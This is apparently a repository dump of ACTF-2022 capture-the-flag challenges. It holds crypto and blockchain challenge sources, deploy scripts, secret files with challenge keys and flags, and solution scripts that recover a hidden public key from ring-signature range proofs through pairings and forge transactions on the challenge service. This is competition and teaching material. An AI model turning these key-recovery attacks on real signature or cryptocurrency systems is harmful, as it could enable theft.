/blockchain/bet2loss/exploits/solution2/build/Context.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/exploits/solution2/build/Context.bin -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/HasState.abi: -------------------------------------------------------------------------------- 1 | [{"inputs":[],"name":"nonce","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"state","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/HasState.bin: -------------------------------------------------------------------------------- 1 | 6080604052348015600f57600080fd5b50608f8061001e6000396000f3fe6080604052348015600f57600080fd5b506004361060325760003560e01c8063affed0e0146037578063c19d93fb146051575b600080fd5b603f60015481565b60405190815260200160405180910390f35b603f6000548156fea2646970667358221220572104ad43db22b47c71b30a517e48207ff3d9c3de51536f11ab8f0fb7bf2d5064736f6c634300080f0033 -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Ownable.abi: -------------------------------------------------------------------------------- 1 | [{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}] -------------------------------------------------------------------------------- /blockchain/bet2loss/exploits/solution2/build/Ownable.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/blockchain/bet2loss/exploits/solution2/build/Ownable.bin -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/crypto_note.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/CryptoNote/attachments/crypto_note.tar.gz -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/hint1.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/CryptoNote/attachments/hint1.tar.gz -------------------------------------------------------------------------------- /crypto/CryptoNote/attachments/hint2.py: -------------------------------------------------------------------------------- 1 | import secret, hashlib 2 | assert hashlib.sha256((hex(secret.bob_pub[0]) + hex(secret.bob_pub[1])).encode()).hexdigest() == "3a66fb0241a28b7439ed71b0a202bd8a904afb8175c1a3247f6335814ccb4969" 3 | assert hashlib.sha256((hex(secret.carol_pub[0]) + hex(secret.carol_pub[1])).encode()).hexdigest() == "eca9746a961fdb403df08880668ebd5322883addb84d3d9d385d54fcfd337dea" -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/Dockerfile: -------------------------------------------------------------------------------- 1 | # docker build -t aaa_crypto_note:latest . 2 | # docker run -p 8080:8080 aaa_crypto_note:latest 3 | FROM sagemath/sagemath:9.5 4 | 5 | WORKDIR /home/sage 6 | 7 | COPY src/* . 8 | RUN chmod +x ./deploy.sh; sudo ./deploy.sh 9 | 10 | EXPOSE 8080 11 | CMD ["sudo", "./run_socat.sh"] 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/deploy.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple 4 | pip3 install pycryptodome 5 | 6 | echo deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ impish main restricted universe multiverse > /etc/apt/sources.list 7 | 8 | apt update 9 | apt install -y socat 10 | 11 | chmod +x /home/sage/run_socat.sh /home/sage/run_instance.sh 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/run_instance.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | python3 blockchain_service.py 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/run_socat.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | socat tcp-listen:8080,fork exec:./run_instance.sh,reuseaddr 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/deploy/src/secret.py: -------------------------------------------------------------------------------- 1 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 2 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 3 | 4 | bob_priv = 0x53b107debf18b3ea554aa73cd6fa5a1fbb65ce6123e000c02ec3d7bb7886c9a6 5 | bob_pub = (0x4456dc89ea7627b2d8dfab635b4e81082718954f1b2634edd94bf4a6287b969, 0x60154f38f9def126611823e205ae3b5e68ffe5a5de6ec48c206738712ad78a1e) 6 | 7 | carol_priv = 0x25b78f8b4f459fcb635e8707115ed8fa9869e0663befdc1232110001b1c9f77 8 | carol_pub = (0x231c0ea18fd6bd4225012d8f7d77e060787f3e6bdc1e0ae3128abe812746632c, 0x5c7b22d3c1c84b1503a67672db29fc149b18c4b26f6387fa1bb95cb50997f1f7) 9 | 10 | flag = "ACTF{C2yPt_N0t3_aNd_EC_1s_F0n_b5R792Fr79Q94iYH9dQybhlQdKG+S8d9fF8QWzA}" 11 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/carol_public_key_restore.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, Hp, proof_H, H as Hb, transaction_curve 2 | from sage.all import * 3 | 4 | E, G = proof_curve() 5 | H = proof_H(E) 6 | 7 | assert E.order() == E.base_field().order() - 1 8 | A = sqrt(E.order()) 9 | assert isinstance(A, Integer) 10 | 11 | rp = RangeProof(OTRS(E, G), H) 12 | 13 | with open("range_proof_from_carol.json", "r") as f: 14 | json = f.read() 15 | 16 | C, proof = deserialize4json(E, json) 17 | 18 | def e(P, Q): 19 | return P.weil_pairing(Q, A) 20 | 21 | def otrs_restore(Ks:list, m:bytes, signature:tuple): 22 | # two ways to restore, co-DDH or SMT 23 | ddh_idx = None 24 | smt_idx = None 25 | I, c_0, r = signature 26 | for i, K in enumerate(Ks): 27 | Q = Hp(E, G, K) 28 | if e(Q, I) == 1: # SMT way 29 | assert smt_idx == None 30 | smt_idx = i 31 | if e(G, I) == e(K, Q): # co-DDH way 32 | assert ddh_idx == None 33 | ddh_idx = i 34 | assert ddh_idx == smt_idx 35 | return smt_idx 36 | 37 | hash_C = Hb(C) 38 | Cs, sigs = proof 39 | bits = [otrs_restore([C, C - 2**i * H], hash_C, sig) for i, (C, sig) in enumerate(zip(Cs, sigs))] 40 | 41 | tE, tG = transaction_curve() 42 | Px = Integer(int(''.join(['0' if x == 0 else '1' for x in bits[::-1]]), 2)) 43 | possible_carol_pub = tE.lift_x(Px, all=True) 44 | 45 | # from secret import carol_priv, carol_pub 46 | # carol_pub = tE(*carol_pub) 47 | # assert carol_priv * tG == carol_pub 48 | # print('found at', possible_carol_pub.index(carol_pub)) 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/secret.py: -------------------------------------------------------------------------------- 1 | # This is a sample file for secret.py. 2 | 3 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 4 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 5 | 6 | # Every secret number in the real secret.py is replaced with 0xAAA...A. 7 | # Every secret string in the real secret.py is replaced with "ACTF{test_flag}". 8 | 9 | bob_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | bob_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 11 | 12 | carol_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | carol_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 14 | 15 | flag = "ACTF{test_flag}" 16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/exploits/signed_message_from_bob.json: -------------------------------------------------------------------------------- 1 | ["Bob: Do you remember the 1 token I lent you? Pay off that loan, now!", "0a0e7495d51cbd5ea045d1cbca47512ef25d5c6207b25f9d67ac0ccc160390020a50d6f4b88e86192a664d3220b84e53c9166d2c993ee1b6d2edbbdfef5461e5"] -------------------------------------------------------------------------------- /crypto/CryptoNote/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # docker build -t aaa_crypto_note:latest . 2 | # docker run -p 8080:8080 aaa_crypto_note:latest 3 | FROM sagemath/sagemath:9.5 4 | 5 | WORKDIR /home/sage 6 | 7 | COPY src/* . 8 | RUN chmod +x ./deploy.sh; sudo ./deploy.sh 9 | 10 | EXPOSE 8080 11 | CMD ["sudo", "./run_socat.sh"] 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/bob_signed_generate.py: -------------------------------------------------------------------------------- 1 | from json import dump 2 | from signed_message_verifier import SM2, get_bob_sign_pub 3 | from secret import bob_priv 4 | 5 | text = 'Bob: Do you remember the 1 token I lent you? Pay off that loan, now!' 6 | signer = SM2(public_key=get_bob_sign_pub(), private_key=hex(bob_priv)[2:].zfill(64)) 7 | sign = signer.sign_with_sm3(text.encode()) 8 | 9 | dump([text, sign], open('signed_message_from_bob.json', 'w')) 10 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/build_attachment.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../attachment 4 | mkdir ../attachment 5 | 6 | mkdir crypto_note 7 | cp blockchain_service.py crypto_note/ 8 | cp ring_signature.py crypto_note/ 9 | cp signed_message_verifier.py crypto_note/ 10 | cp signed_message_from_bob.json crypto_note/ 11 | cp range_proof_from_carol.json crypto_note/ 12 | cp range_proof_verifier.py crypto_note/ 13 | cp secret_demo.py crypto_note/secret.py 14 | tar czvf crypto_note.tar.gz crypto_note/ 15 | rm -rf crypto_note 16 | 17 | mv crypto_note.tar.gz ../attachment 18 | 19 | mkdir hint1 20 | cp bob_signed_generate.py hint1/ 21 | cp carol_range_proof_generate.py hint1/ 22 | tar czvf hint1.tar.gz hint1/ 23 | rm -rf hint1 24 | 25 | mv hint1.tar.gz ../attachment 26 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/calc_edo_curve.sage: -------------------------------------------------------------------------------- 1 | """ 2 | generate embed degree one curve 3 | """ 4 | 5 | from sage.all import * 6 | 7 | """ 8 | while True: 9 | print("epoch") 10 | n = random_prime(2**375) 11 | A = 2 * n 12 | p = A^2 + 1 13 | if is_prime(p): 14 | break 15 | print(f'{n = :#x}') 16 | print(f'{A = :#x}') 17 | print(f'{p = :#x}') 18 | """ 19 | 20 | n = 0x6c0edfb182b3b5ce4d8cf2db057c675f0ca6c5631e6accf20cc6f3a987eeecc79b285eb1ef132bf71e24c68aa4ca39 21 | A = 0xd81dbf6305676b9c9b19e5b60af8cebe194d8ac63cd599e4198de7530fddd98f3650bd63de2657ee3c498d15499472 22 | p = 0xb672366c04a2a76427e4f60dbbdfc3b0632d34a5819a44ddf3f01223763741a3126addbae4424bc0e8d6c78a4c083e3c995665a68c58c0f841ccacdf4f0a6fa46f1df43d935b784cf75113327e25c7304becd4a54be1f8ebb114b31802c5 23 | 24 | FF = GF(p) 25 | assert A % 4 == 0 or A % 4 == 2 26 | a = (p - 1) if A % 4 == 0 else (p - 4) 27 | E = EllipticCurve(FF, [a, 0]) 28 | assert E.order() == p - 1 29 | 30 | P = E.random_point() 31 | Q = E.random_point() 32 | 33 | assert P.weil_pairing(2 * P, A) == 1 34 | 35 | pq = P.weil_pairing(Q, A) 36 | assert pq != 1 37 | xpq = (3 * P).weil_pairing(4 * Q, A) 38 | assert pq^12 == xpq 39 | 40 | pq = P.tate_pairing(Q, A, 1) 41 | assert pq != 1 42 | xpq = (3 * P).tate_pairing(4 * Q, A, 1) 43 | assert pq^12 == xpq 44 | 45 | print('Tate e(P, Q) =', P.tate_pairing(Q, A, 1)) 46 | 47 | print(f'curve_gen({p}, [{a}, {3 * p}], {P.xy()[0]}, {P.xy()[1]}, {E.order()})') 48 | print(f'E({Q.xy()[0]}, {Q.xy()[1]})') 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/carol_public_key_restore.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, Hp, proof_H, H as Hb, transaction_curve 2 | from sage.all import * 3 | 4 | E, G = proof_curve() 5 | H = proof_H(E) 6 | 7 | assert E.order() == E.base_field().order() - 1 8 | A = sqrt(E.order()) 9 | assert isinstance(A, Integer) 10 | 11 | rp = RangeProof(OTRS(E, G), H) 12 | 13 | with open("range_proof_from_carol.json", "r") as f: 14 | json = f.read() 15 | 16 | C, proof = deserialize4json(E, json) 17 | 18 | def e(P, Q): 19 | return P.weil_pairing(Q, A) 20 | 21 | def otrs_restore(Ks:list, m:bytes, signature:tuple): 22 | # two ways to restore, co-DDH or SMT 23 | ddh_idx = None 24 | smt_idx = None 25 | I, c_0, r = signature 26 | for i, K in enumerate(Ks): 27 | Q = Hp(E, G, K) 28 | if e(Q, I) == 1: # SMT way 29 | assert smt_idx == None 30 | smt_idx = i 31 | if e(G, I) == e(K, Q): # co-DDH way 32 | assert ddh_idx == None 33 | ddh_idx = i 34 | assert ddh_idx == smt_idx 35 | return smt_idx 36 | 37 | hash_C = Hb(C) 38 | Cs, sigs = proof 39 | bits = [otrs_restore([C, C - 2**i * H], hash_C, sig) for i, (C, sig) in enumerate(zip(Cs, sigs))] 40 | 41 | tE, tG = transaction_curve() 42 | Px = Integer(int(''.join(['0' if x == 0 else '1' for x in bits[::-1]]), 2)) 43 | possible_carol_pub = tE.lift_x(Px, all=True) 44 | 45 | # from secret import carol_priv, carol_pub 46 | # carol_pub = tE(*carol_pub) 47 | # assert carol_priv * tG == carol_pub 48 | # print('found at', possible_carol_pub.index(carol_pub)) 49 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/carol_range_proof_generate.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, serialize2json, proof_H 2 | 3 | E, G = proof_curve() 4 | H = proof_H(E) 5 | 6 | rp = RangeProof(OTRS(E, G), H) 7 | Ct = rp.generate_commitment(__import__('secret').carol_pub[0]) 8 | x, r, C = Ct 9 | proof = rp.prove(Ct, 256) 10 | assert rp.verify(C, 256, proof) 11 | with open("range_proof_from_carol.json", "w") as f: 12 | f.write(serialize2json(C, proof)) 13 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/copy_deploy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../deploy 4 | mkdir ../deploy 5 | mkdir ../deploy/src 6 | 7 | cp Dockerfile ../deploy 8 | cp blockchain_service.py ../deploy/src 9 | cp ring_signature.py ../deploy/src 10 | cp secret.py ../deploy/src 11 | cp deploy.sh ../deploy/src 12 | cp run_instance.sh ../deploy/src 13 | cp run_socat.sh ../deploy/src 14 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/copy_solution.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | rm -rf ../solution 4 | mkdir ../solution 5 | 6 | cp blockchain_service.py ../solution 7 | cp ring_signature.py ../solution 8 | cp bob_public_key_restore.py ../solution 9 | cp carol_public_key_restore.py ../solution 10 | cp signed_message_verifier.py ../solution 11 | cp solution.py ../solution 12 | cp signed_message_from_bob.json ../solution 13 | cp range_proof_from_carol.json ../solution 14 | cp secret_demo.py ../solution/secret.py 15 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/deploy.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | pip3 config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple 4 | pip3 install pycryptodome 5 | 6 | echo deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu/ impish main restricted universe multiverse > /etc/apt/sources.list 7 | 8 | apt update 9 | apt install -y socat 10 | 11 | chmod +x /home/sage/run_socat.sh /home/sage/run_instance.sh 12 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/range_proof_verifier.py: -------------------------------------------------------------------------------- 1 | from ring_signature import proof_curve, RangeProof, OTRS, deserialize4json, proof_H 2 | 3 | E, G = proof_curve() 4 | H = proof_H(E) 5 | 6 | rp = RangeProof(OTRS(E, G), H) 7 | 8 | with open("range_proof_from_carol.json", "r") as f: 9 | json = f.read() 10 | 11 | C, proof = deserialize4json(E, json) 12 | print("verfied" if rp.verify(C, 256, proof) else "FAKE PROOF!") 13 | 14 | # Note: C is a Pedersen commitment for the x-coordinate of Carol's Public key. 15 | # It generated by `rp.generate_commitment(__import__('secret').carol_pub[0])`. 16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/run_instance.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | python3 blockchain_service.py 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/run_socat.sh: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/sage-entrypoint /bin/bash 2 | 3 | socat tcp-listen:8080,fork exec:./run_instance.sh,reuseaddr 4 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/secret.py: -------------------------------------------------------------------------------- 1 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 2 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 3 | 4 | bob_priv = 0x53b107debf18b3ea554aa73cd6fa5a1fbb65ce6123e000c02ec3d7bb7886c9a6 5 | bob_pub = (0x4456dc89ea7627b2d8dfab635b4e81082718954f1b2634edd94bf4a6287b969, 0x60154f38f9def126611823e205ae3b5e68ffe5a5de6ec48c206738712ad78a1e) 6 | 7 | carol_priv = 0x25b78f8b4f459fcb635e8707115ed8fa9869e0663befdc1232110001b1c9f77 8 | carol_pub = (0x231c0ea18fd6bd4225012d8f7d77e060787f3e6bdc1e0ae3128abe812746632c, 0x5c7b22d3c1c84b1503a67672db29fc149b18c4b26f6387fa1bb95cb50997f1f7) 9 | 10 | flag = "ACTF{C2yPt_N0t3_aNd_EC_1s_F0n_b5R792Fr79Q94iYH9dQybhlQdKG+S8d9fF8QWzA}" 11 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/secret_demo.py: -------------------------------------------------------------------------------- 1 | # This is a sample file for secret.py. 2 | 3 | alice_priv = 0xa42d6d662afa3114ccf2678f766048faca568bb804de9e0ba17ee18e6af7565 4 | alice_pub = (0x53f9f8c1226769b84fcf8564c2521f87849f8b993ee8fc9784f3a900d896a730, 0x489b81283080f4db6db6c1635a839b89a5eefe8442fd2bced94c39c8cb6470b5) 5 | 6 | # Every secret number in the real secret.py is replaced with 0xAAA...A. 7 | # Every secret string in the real secret.py is replaced with "ACTF{test_flag}". 8 | 9 | bob_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 10 | bob_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 11 | 12 | carol_priv = 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 13 | carol_pub = (0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) 14 | 15 | flag = "ACTF{test_flag}" 16 | -------------------------------------------------------------------------------- /crypto/CryptoNote/src/signed_message_from_bob.json: -------------------------------------------------------------------------------- 1 | ["Bob: Do you remember the 1 token I lent you? Pay off that loan, now!", "0a0e7495d51cbd5ea045d1cbca47512ef25d5c6207b25f9d67ac0ccc160390020a50d6f4b88e86192a664d3220b84e53c9166d2c993ee1b6d2edbbdfef5461e5"] -------------------------------------------------------------------------------- /crypto/CryptoNote/src/solution_fake.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from secret import alice_priv, alice_pub, bob_priv, bob_pub, carol_pub 3 | from json import dumps 4 | from blockchain_service import BCTransaction 5 | from ring_signature import transaction_curve, serialize2json 6 | 7 | E, G = transaction_curve() 8 | 9 | rr = process(['python3', 'blockchain_service.py']) 10 | 11 | def submit_to_rpc_1(type_str, transaction=None): 12 | req = dict() 13 | req['type'] = type_str 14 | if transaction is not None: 15 | req['transaction'] = transaction 16 | json = dumps(req) 17 | rr.sendlineafter(b'req> ', json.encode()) 18 | recv = rr.recvuntil(b'\n').strip() 19 | return recv 20 | 21 | def generate_show_state(txi, pub): 22 | key_images = [] 23 | txos = [E(carol_pub), E(bob_pub), E(alice_pub), E(bob_pub), E(carol_pub)][:txi+1] 24 | pk_owned = dict() 25 | pk_owned[pub] = [txi] 26 | return serialize2json(pk_owned, txos, key_images) 27 | 28 | def transfer_to(txo_id, priv, pub): 29 | # transfer txo_id, priv to pub 30 | transaction = BCTransaction.generate(txo_id, pub, priv, generate_show_state(txo_id, priv * G)) 31 | return submit_to_rpc_1("new_transaction", transaction.serialize()) 32 | 33 | transfer_to(2, alice_priv, E(bob_pub)) 34 | print(transfer_to(3, bob_priv, E(carol_pub)).decode()) 35 | rr.interactive() 36 | rr.close() 37 | -------------------------------------------------------------------------------- /crypto/RSA_Leak/writeup_en.md: -------------------------------------------------------------------------------- 1 | Firstly, using meet-in-the-middle attack(just brute force), we can easily get the rq and rq. Here, rq and rq are about $2^{24}$ and we also know $n = (a^4 + rp) ∗ (b^4 + rq) = (ab)^4 + O(a^4)​$. Based on this fact, we have $a*b=n^{1/4}$. Finally, using these two equation, we can solve the $a$ and $b$. Knowing the $p$ and $q$ -> get flag~ -------------------------------------------------------------------------------- /crypto/casino/attachments/Dockerfile: -------------------------------------------------------------------------------- 1 | # sudo docker build -t aaacasino:latest . 2 | # sudo docker run -p 19991:19991 aaacasino:latest 3 | FROM ubuntu:20.04 4 | 5 | RUN apt-get -qq update && apt-get install -qq --no-install-recommends xinetd python3-pip 6 | RUN pip3 install pycryptodome 7 | RUN pip3 install qunetsim 8 | RUN apt-get install -qq --no-install-recommends netcat 9 | 10 | COPY main.py / 11 | COPY backend.py / 12 | COPY players.py / 13 | COPY casino.py / 14 | COPY secret.py / 15 | COPY service.conf / 16 | COPY wrapper / 17 | 18 | 19 | RUN chmod +x /main.py /backend.py /players.py /casino.py /secret.py 20 | RUN chmod +x /service.conf /wrapper 21 | 22 | EXPOSE 19991 23 | 24 | CMD ["/usr/sbin/xinetd", "-filelog", "/dev/stderr", "-dontfork", "-f", "/service.conf"] 25 | -------------------------------------------------------------------------------- /crypto/casino/attachments/backend.py: -------------------------------------------------------------------------------- 1 | from qunetsim import Network 2 | 3 | 4 | def exchange_key(aaa, tbd, qubits_n): 5 | network = Network.get_instance() 6 | nodes = [aaa.host.host_id, tbd.host.host_id] 7 | network.start(nodes) 8 | 9 | network.delay = 0.0 10 | 11 | network.add_host(aaa.host) 12 | network.add_host(tbd.host) 13 | 14 | t1 = aaa.host.run_protocol(aaa.exchange_key, (tbd.host.host_id, qubits_n*2)) 15 | t2 = tbd.host.run_protocol(tbd.exchange_key, (aaa.host.host_id, qubits_n*2)) 16 | t1.join() 17 | t2.join() 18 | 19 | return network 20 | 21 | 22 | def bet_in_casino(network, aaa, tbd, bet_times): 23 | t1 = aaa.host.run_protocol(aaa.bet, (tbd.host.host_id, bet_times)) 24 | t2 = tbd.host.run_protocol(tbd.bet, (aaa.host.host_id, bet_times)) 25 | t1.join() 26 | t2.join() 27 | 28 | return network 29 | -------------------------------------------------------------------------------- /crypto/casino/attachments/casino.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | CASINO_DESCRIPTION = \ 4 | "==========================================================================\n" \ 5 | "| Hey gambler! Welcome to AAA casino, here you are going to bet with me.\n" \ 6 | "| Hope you can win a lot of money.\n" \ 7 | "| If you are outstanding enough, I will give you flag.\n" \ 8 | "==========================================================================\n" \ 9 | 10 | WIN_MSG = \ 11 | "Your gambling skills have been declared to be outstanding, here is the flag: " 12 | 13 | LOSE_MSG = \ 14 | "Go ahead, you can be better." -------------------------------------------------------------------------------- /crypto/casino/attachments/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | import signal 5 | import random, string, hashlib 6 | 7 | 8 | def proof_of_work(): 9 | proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)]) 10 | digest = hashlib.sha256(proof.encode()).hexdigest() 11 | print("sha256(XXXX+%s) == %s" % (proof[4:], digest)) 12 | x = input("Give me XXXX: ") 13 | if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest: 14 | print("Sorry~ bye~") 15 | return False 16 | print("Right!") 17 | return True 18 | 19 | 20 | def main(): 21 | from backend import bet_in_casino, exchange_key 22 | from players import AAA, GAMBLER 23 | from casino import CASINO_DESCRIPTION 24 | 25 | print(CASINO_DESCRIPTION) 26 | sys.stdout.flush() 27 | signal.alarm(300) 28 | 29 | aaa = AAA() 30 | gambler = GAMBLER() 31 | 32 | network = exchange_key(aaa, gambler, 128) 33 | if aaa.secret_iv != gambler.secret_iv: 34 | print("byebye~~") 35 | network.stop(True) 36 | return 37 | print("good job!") 38 | 39 | network = bet_in_casino(network, aaa, gambler, 256) 40 | network.stop(True) 41 | 42 | 43 | if __name__ == "__main__": 44 | if proof_of_work(): 45 | main() 46 | -------------------------------------------------------------------------------- /crypto/casino/attachments/secret.py: -------------------------------------------------------------------------------- 1 | 2 | flag = 'ACTF{this_is_a_local_flag-please_connect_to_the_remote_server_to_get_true_flag}' -------------------------------------------------------------------------------- /crypto/casino/attachments/service.conf: -------------------------------------------------------------------------------- 1 | service service 2 | { 3 | socket_type = stream 4 | protocol = tcp 5 | wait = no 6 | user = nobody 7 | bind = 0.0.0.0 8 | server = /wrapper 9 | port = 19991 10 | type = UNLISTED 11 | 12 | # If it makese sense to limit the CPU a single person can use: 13 | nice = 1 14 | # max number of "CPU seconds" (less than the wallclock timeout) 15 | # rlimit_cpu = 30 16 | # internal memory limit -- also see the k8s limit in info.yml 17 | # rlimit_as = 4000M 18 | rlimit_cpu = UNLIMITED 19 | rlimit_as = UNLIMITED 20 | rlimit_rss = UNLIMITED 21 | 22 | # Do not have more than X instances at the same time. 23 | # Note that the load balancer is NOT AWARE OF THIS, and so users (and the healthcheck) 24 | # will see failures. We have scripts to handle connection queues if useful, but 25 | # ideally this will never happen in prodction. POWs can be transparently required. 26 | instances = 128 27 | cps = 100 16 28 | # Cannot use: per_source (that's the load balancer) 29 | } -------------------------------------------------------------------------------- /crypto/casino/attachments/wrapper: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | /main.py -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/crypto/impossibleRSA/attachments/flag -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQB+pWAiyLgiiDUmsUJs4sGi 3 | BJeEwLvitqUvBVtcgPEFK4vO4G6CNAd3JlN8zBqJRBVn1FRlcxGPPXuJgIjMOkyV 4 | G4vo3mLr/v/pER79JrPgP8E5hShao5rujsue8NUq9+r1dUsnqU3gEiPyZspAG+// 5 | 8P7TW0XcvCy5olRZqkV/QD6dlqjBaufWgTL2iMCtkadXT99ETmmgDVJ/GE51xErz 6 | pE8poKXjJqnwZEWEjdcqO1RXHKLAcmm3mpQEGbFOXWlb2cqSnKTbtJ0cVQ93y3gA 7 | mjCCBJrQLulx+5Oyn2+1rkRlHuMSq82DC0qAMvbc/DTjlTVYSC+GvIpEEFR344/5 8 | AgMBAAE= 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /crypto/impossibleRSA/attachments/server.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import * 2 | from Crypto.PublicKey import RSA 3 | 4 | e = 65537 5 | flag = b'ACTF{...}' 6 | 7 | while 